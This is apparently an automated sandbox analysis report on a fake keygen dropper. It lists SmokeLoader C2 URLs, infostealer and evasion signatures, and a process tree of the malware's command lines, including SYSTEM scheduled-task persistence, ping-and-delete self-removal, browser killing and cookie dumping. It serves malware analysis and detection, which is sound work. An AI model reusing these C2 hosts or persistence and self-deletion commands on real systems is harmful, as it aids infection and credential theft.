Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1775s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 62 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 32 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 40 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: MapViewOfSection 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:476
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1800
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {63267904-279A-4DEB-8F3D-EEE19BAE5100} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:1808
              • C:\Users\Admin\AppData\Roaming\vfvafua
                C:\Users\Admin\AppData\Roaming\vfvafua
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2420
                • C:\Users\Admin\AppData\Roaming\vfvafua
                  C:\Users\Admin\AppData\Roaming\vfvafua
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:7456
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {7F4DE2B5-5133-4910-A3B7-ACB1946AD7C4} S-1-5-18:NT AUTHORITY\System:Service:
              3⤵
                PID:2276
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                  4⤵
                  • Executes dropped EXE
                  PID:1132
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                  4⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  • Modifies system certificate store
                  PID:2800
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                  4⤵
                  • Executes dropped EXE
                  PID:2212
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                  4⤵
                  • Executes dropped EXE
                  PID:1700
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                  4⤵
                  • Executes dropped EXE
                  PID:4148
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                  4⤵
                  • Executes dropped EXE
                  PID:4168
                • C:\Windows\system32\rundll32.exe
                  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                  4⤵
                  • Windows security modification
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  PID:1712
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {795EA838-84D6-4FDB-85A7-56B442BA704C} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                3⤵
                  PID:2916
                  • C:\Users\Admin\AppData\Roaming\vfvafua
                    C:\Users\Admin\AppData\Roaming\vfvafua
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:7512
                    • C:\Users\Admin\AppData\Roaming\vfvafua
                      C:\Users\Admin\AppData\Roaming\vfvafua
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:7580
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {D6DEED30-78DB-4EE9-97A0-51ACC5B462EF} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                  3⤵
                    PID:7528
                    • C:\Users\Admin\AppData\Roaming\vfvafua
                      C:\Users\Admin\AppData\Roaming\vfvafua
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:7580
                      • C:\Users\Admin\AppData\Roaming\vfvafua
                        C:\Users\Admin\AppData\Roaming\vfvafua
                        5⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3004
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:328
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Drops file in System32 directory
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:1280
                • C:\Windows\system32\msiexec.exe
                  C:\Windows\system32\msiexec.exe /V
                  2⤵
                  • Enumerates connected drives
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:2100
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding DBB1CE6E494DA852182931E9A45EC10F C
                    3⤵
                    • Loads dropped DLL
                    PID:2256
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding 85E9F30ECF17F45EA715C05FB227B6DC
                    3⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    PID:2324
                    • C:\Windows\SysWOW64\taskkill.exe
                      "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                      4⤵
                      • Kills process with taskkill
                      PID:2604
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding 1C5780B6595CD43422DC46D3C72B85C2 M Global\MSI0000
                    3⤵
                      PID:2212
                • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                  "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                  1⤵
                  • Loads dropped DLL
                  • Checks whether UAC is enabled
                  • Suspicious use of WriteProcessMemory
                  PID:108
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:1288
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                      3⤵
                      • Loads dropped DLL
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1840
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1680
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:920
                    • C:\Users\Admin\AppData\Local\Temp\is-6SKJ5.tmp\Install.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-6SKJ5.tmp\Install.tmp" /SL5="$3017C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1884
                      • C:\Users\Admin\AppData\Local\Temp\is-1211O.tmp\Ultra.exe
                        "C:\Users\Admin\AppData\Local\Temp\is-1211O.tmp\Ultra.exe" /S /UID=burnerch1
                        4⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Drops file in Program Files directory
                        • Modifies system certificate store
                        • Suspicious use of WriteProcessMemory
                        PID:1232
                        • C:\Program Files\MSBuild\MBGEUIKAAN\ultramediaburner.exe
                          "C:\Program Files\MSBuild\MBGEUIKAAN\ultramediaburner.exe" /VERYSILENT
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1608
                          • C:\Users\Admin\AppData\Local\Temp\is-I2HAI.tmp\ultramediaburner.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-I2HAI.tmp\ultramediaburner.tmp" /SL5="$10192,281924,62464,C:\Program Files\MSBuild\MBGEUIKAAN\ultramediaburner.exe" /VERYSILENT
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:1972
                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                              7⤵
                              • Executes dropped EXE
                              PID:1640
                        • C:\Users\Admin\AppData\Local\Temp\3b-15fc2-686-6c497-8284ba9ee4661\Xylaehaqeco.exe
                          "C:\Users\Admin\AppData\Local\Temp\3b-15fc2-686-6c497-8284ba9ee4661\Xylaehaqeco.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:1208
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                            6⤵
                            • Modifies Internet Explorer settings
                            • Suspicious behavior: GetForegroundWindowSpam
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:1576
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:275457 /prefetch:2
                              7⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:576
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:275461 /prefetch:2
                              7⤵
                              • Modifies Internet Explorer settings
                              • NTFS ADS
                              • Suspicious use of SetWindowsHookEx
                              PID:2160
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:340994 /prefetch:2
                              7⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1392
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 216
                                8⤵
                                • Program crash
                                • Suspicious behavior: GetForegroundWindowSpam
                                PID:2864
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:1258512 /prefetch:2
                              7⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:2848
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                            6⤵
                              PID:8172
                          • C:\Users\Admin\AppData\Local\Temp\b4-44425-8da-42585-61a4785b743d5\Jecofaezhamu.exe
                            "C:\Users\Admin\AppData\Local\Temp\b4-44425-8da-42585-61a4785b743d5\Jecofaezhamu.exe"
                            5⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            PID:592
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dsm4d1fj.nyh\KiffMainE1.exe & exit
                              6⤵
                                PID:2060
                                • C:\Users\Admin\AppData\Local\Temp\dsm4d1fj.nyh\KiffMainE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\dsm4d1fj.nyh\KiffMainE1.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2628
                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                    dw20.exe -x -s 532
                                    8⤵
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    PID:2732
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kirbhlrw.p4r\installer.exe /qn CAMPAIGN="654" & exit
                                6⤵
                                  PID:2264
                                  • C:\Users\Admin\AppData\Local\Temp\kirbhlrw.p4r\installer.exe
                                    C:\Users\Admin\AppData\Local\Temp\kirbhlrw.p4r\installer.exe /qn CAMPAIGN="654"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Enumerates connected drives
                                    • Modifies system certificate store
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of FindShellTrayWindow
                                    PID:2976
                                    • C:\Windows\SysWOW64\msiexec.exe
                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\kirbhlrw.p4r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\kirbhlrw.p4r\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037969 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                      8⤵
                                        PID:3036
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4pvetmue.csw\gpooe.exe & exit
                                    6⤵
                                      PID:3012
                                      • C:\Users\Admin\AppData\Local\Temp\4pvetmue.csw\gpooe.exe
                                        C:\Users\Admin\AppData\Local\Temp\4pvetmue.csw\gpooe.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:2480
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:964
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:2832
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:8000
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                          • Executes dropped EXE
                                          PID:7784
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vikxdbvs.5vi\google-game.exe & exit
                                      6⤵
                                        PID:2132
                                        • C:\Users\Admin\AppData\Local\Temp\vikxdbvs.5vi\google-game.exe
                                          C:\Users\Admin\AppData\Local\Temp\vikxdbvs.5vi\google-game.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2456
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                            8⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            PID:2712
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwwfdsfc.fpx\huesaa.exe & exit
                                        6⤵
                                          PID:2064
                                          • C:\Users\Admin\AppData\Local\Temp\xwwfdsfc.fpx\huesaa.exe
                                            C:\Users\Admin\AppData\Local\Temp\xwwfdsfc.fpx\huesaa.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2496
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2268
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:920
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:7992
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:7800
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dyw5u1j.2rx\askinstall39.exe & exit
                                            6⤵
                                              PID:3016
                                              • C:\Users\Admin\AppData\Local\Temp\2dyw5u1j.2rx\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\2dyw5u1j.2rx\askinstall39.exe
                                                7⤵
                                                  PID:2948
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                    8⤵
                                                      PID:2408
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im chrome.exe
                                                        9⤵
                                                        • Kills process with taskkill
                                                        PID:2180
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4xsejpi.jce\setup.exe & exit
                                                  6⤵
                                                    PID:2676
                                                    • C:\Users\Admin\AppData\Local\Temp\m4xsejpi.jce\setup.exe
                                                      C:\Users\Admin\AppData\Local\Temp\m4xsejpi.jce\setup.exe
                                                      7⤵
                                                        PID:2744
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\m4xsejpi.jce\setup.exe"
                                                          8⤵
                                                            PID:2448
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping 1.1.1.1 -n 1 -w 3000
                                                              9⤵
                                                              • Runs ping.exe
                                                              PID:2852
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m5mccq1v.jap\Setup_v3.exe & exit
                                                        6⤵
                                                          PID:2152
                                                          • C:\Users\Admin\AppData\Local\Temp\m5mccq1v.jap\Setup_v3.exe
                                                            C:\Users\Admin\AppData\Local\Temp\m5mccq1v.jap\Setup_v3.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            PID:1164
                                                            • C:\Windows\SysWOW64\at.exe
                                                              "C:\Windows\System32\at.exe"
                                                              8⤵
                                                                PID:2288
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                8⤵
                                                                  PID:1696
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\System32\cmd.exe
                                                                    9⤵
                                                                      PID:1568
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                        10⤵
                                                                          PID:1988
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                          Fessura.exe.com Z
                                                                          10⤵
                                                                            PID:2936
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2332
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                12⤵
                                                                                • Executes dropped EXE
                                                                                • Creates scheduled task(s)
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                PID:832
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                12⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                PID:2948
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            10⤵
                                                                            • Runs ping.exe
                                                                            PID:2096
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        8⤵
                                                                          PID:2880
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xucj2htr.st5\toolspab1.exe & exit
                                                                      6⤵
                                                                        PID:2096
                                                                        • C:\Users\Admin\AppData\Local\Temp\xucj2htr.st5\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\xucj2htr.st5\toolspab1.exe
                                                                          7⤵
                                                                            PID:836
                                                                            • C:\Users\Admin\AppData\Local\Temp\xucj2htr.st5\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\xucj2htr.st5\toolspab1.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2084
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fmfvbbkl.sfg\005.exe & exit
                                                                          6⤵
                                                                            PID:2472
                                                                            • C:\Users\Admin\AppData\Local\Temp\fmfvbbkl.sfg\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\fmfvbbkl.sfg\005.exe
                                                                              7⤵
                                                                                PID:832
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvglpkqz.uab\SunLabsPlayer.exe /S & exit
                                                                              6⤵
